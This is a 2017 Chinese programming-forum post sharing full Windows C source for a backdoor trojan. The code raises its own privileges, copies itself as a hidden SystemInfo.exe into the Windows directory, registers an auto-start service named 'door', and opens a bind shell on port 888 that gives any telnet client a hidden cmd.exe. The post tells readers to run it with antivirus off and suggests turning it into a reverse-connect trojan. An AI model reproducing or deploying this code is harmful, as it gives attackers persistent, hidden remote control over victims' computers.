标题:后门木马设计
取消只看楼主
GodOneisCode
Rank: 1
等 级:新手上路
帖 子:5
专家分:0
注 册:2017-2-2
 问题点数:0 回复次数:0 
后门木马设计
双管道后面木马源代码
程序代码:
// 实验 : Virus.exe
// 作者 : GodisCodeLife
// 完成时间 : 一周

#include <Stdio.h>
#include <Winsock2.h>
#include <Windows.h>
#include <Tlhelp32.h>
#pragma comment(lib, "Ws2_32.lib")

VOID DebugPrivilege();
VOID CloseHandle(DWORD dwPid);
DWORD GetProcessId(char *szProcessName);
VOID EnterService();
VOID Telnetdoor();

int main(int argc, char **argv)
{
    // 自身目录
    char szCurrDir[MAX_PATH] = { 0 };
    GetModuleFileName(NULL, szCurrDir, MAX_PATH);
    int ch = '\\';
    char *pFileName = strrchr(szCurrDir, ch);
    int nLen = strlen(szCurrDir) - strlen(pFileName);
    szCurrDir[nLen] = NULL;

    DebugPrivilege();
    EnterService();
    DWORD dwPid = GetProcessId(pFileName);
    Telnetdoor();
    CloseHandle(dwPid);
    return 0;
}

// 提升限权
VOID DebugPrivilege()
{
    HANDLE hToken = NULL;

    // 打开令牌
    BOOL bRet = OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken);

    if ( bRet == TRUE )
    {
        TOKEN_PRIVILEGES tp;
        tp.PrivilegeCount = 1;
        LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
        CloseHandle(hToken);
    }
}

// PID获取
DWORD GetProcessId(char *szProcessName)
{
    DWORD dwPid = 0;
    BOOL bRet = 0;
    PROCESSENTRY32 pe32 = { 0 };
    pe32.dwSize = sizeof(PROCESSENTRY32);

    // 获取进程列表
    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    // 查找进程
    bRet = Process32First(hSnap, &pe32);

    while ( bRet )
    {
        if ( strcmp(pe32.szExeFile, szProcessName) == 0 )
        {
            break;
        }
        bRet = Process32Next(hSnap, &pe32);
    }

    dwPid = pe32.th32ProcessID;
    return dwPid;
}

// 结束某进程
VOID CloseHandle(DWORD dwPid)
{
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
    TerminateProcess(hProcess, 0);
    CloseHandle(hProcess);
}

// 驱动木马服务自启动
VOID EnterService()
{
    char szFileName[MAX_PATH] = { 0 };
    GetModuleFileName(NULL, szFileName, MAX_PATH);

    // 打开服务管理
    SC_HANDLE scHandle = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    SC_HANDLE scHandleOpen = OpenService(scHandle, "door", SERVICE_ALL_ACCESS);

    if ( scHandleOpen == NULL )
    {
        char szSelfFile[MAX_PATH] = { 0 };
        char szSystemPath[MAX_PATH] = { 0 };

        GetWindowsDirectory(szSystemPath, MAX_PATH);
        strcat(szSystemPath, "\\SystemInfo.exe");
        GetModuleFileName(NULL, szSelfFile, MAX_PATH);

        CopyFile(szSelfFile, szSystemPath, FALSE);
        SetFileAttributes(szSystemPath, FILE_ATTRIBUTE_HIDDEN);

        // 创建木马服务
        SC_HANDLE scNewHandle = CreateService(scHandle,
            "door",
            "door",
            SERVICE_ALL_ACCESS,
            SERVICE_WIN32_OWN_PROCESS,
            SERVICE_AUTO_START,
            SERVICE_ERROR_IGNORE,
            szSystemPath,
            NULL,
            NULL,
            NULL,
            NULL,
            NULL);

        // 启动木马服务
        StartService(scNewHandle, 0, NULL);
        CloseServiceHandle(scNewHandle);
    }

    CloseServiceHandle(scHandleOpen);
    CloseServiceHandle(scHandle);
}

// 实现CMD远程控制
VOID Telnetdoor()
{
    WSADATA wsa;
    WSAStartup(MAKEWORD(2, 2), &wsa);

    // 创建套接字
    SOCKET s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);

    // 填充信息
    sockaddr_in sock;
    sock.sin_family = AF_INET;
    sock.sin_addr.S_un.S_addr = ADDR_ANY;
    sock.sin_port = htons(888);
    bind(s, (SOCKADDR *)&sock, sizeof(SOCKADDR));

    listen(s, 1);

    // 接受连接
    sockaddr_in sockClient;
    int SaddrSize = sizeof(SOCKADDR);
    SOCKET sc = accept(s, (SOCKADDR *)&sockClient, &SaddrSize);

    // 创建管道
    SECURITY_ATTRIBUTES sa1, sa2;
    HANDLE hRead1, hRead2, hWrite1, hWrite2;

    sa1.nLength = sizeof(SECURITY_ATTRIBUTES);
    sa1.lpSecurityDescriptor = NULL;
    sa1.bInheritHandle = TRUE;

    sa2.nLength = sizeof(SECURITY_ATTRIBUTES);
    sa2.lpSecurityDescriptor = NULL;
    sa2.bInheritHandle = TRUE;

    CreatePipe(&hRead1, &hWrite1, &sa1, 0);
    CreatePipe(&hRead2, &hWrite2, &sa2, 0);

    // 创建用于通信的子程序
    STARTUPINFO si;
    PROCESS_INFORMATION pi;

    ZeroMemory(&si, sizeof(STARTUPINFO));
    si.cb = sizeof(STARTUPINFO);
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.wShowWindow = SW_HIDE;
    // 管道1用于输出
    // 管道2用于输入
    si.hStdInput = hRead2;
    si.hStdOutput = hWrite1;
    si.hStdError = hWrite1;

    char *szCmd = "cmd";
    // 创建子进程
    CreateProcess(NULL, szCmd, NULL, NULL,
        TRUE, 0, NULL, NULL, &si, &pi);

    // 定义输入\输出大小
    DWORD dwBytes = 0;
    BOOL bRet = FALSE;
    char szBuffer[0x1000] = { 0 };
    char szCommand[0x1000] = { 0 };


    // 循环接受命令
    while ( TRUE )
    {
        // 发送命令
        ZeroMemory(szCommand, 0x1000);

        bRet = PeekNamedPipe(hRead1, szBuffer, 0x1000, &dwBytes, 0, 0);
        if ( dwBytes )
        {
            ReadFile(hRead1, szBuffer, 0x1000, &dwBytes, NULL);
            send(sc, szBuffer, dwBytes, 0);
        }
        else
        {
            int i = 0;
            while ( 1 )
            {
                // 接受回显
                dwBytes = recv(sc, szBuffer, 0x1000, 0);
                if ( dwBytes <= 0)
                {
                    break;
                }

                szCommand[i++] = szBuffer[0];
                if ( szBuffer[0] == '\r' || szBuffer[0] == '\n' )
                {
                    szCommand[i-1] = '\n';
                    break;
                }
            }
            // 写入管道
            WriteFile(hWrite2, szCommand, i, &dwBytes, NULL);
        }
    }    
    WSACleanup();
}


编译连接运行这个木马(关闭杀毒软件), 然后打开CMD,用Telnet命令连接这个木马。
如果不会Telnet命令的朋友可以上网查找详细用法。
事例: Telnet 中木马的IP地址 888
由于程序中绑定的是888端口,所以必须连接888端口才有效。
如果有能力的学友,可以将其更改成反弹式木马,那样就更完美了。
搜索更多相关主题的帖子: 源代码 color 管道 
2017-02-02 15:22



参与讨论请移步原网站贴子:https://bbs.bccn.net/thread-473937-1-1.html




关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.035336 second(s), 8 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved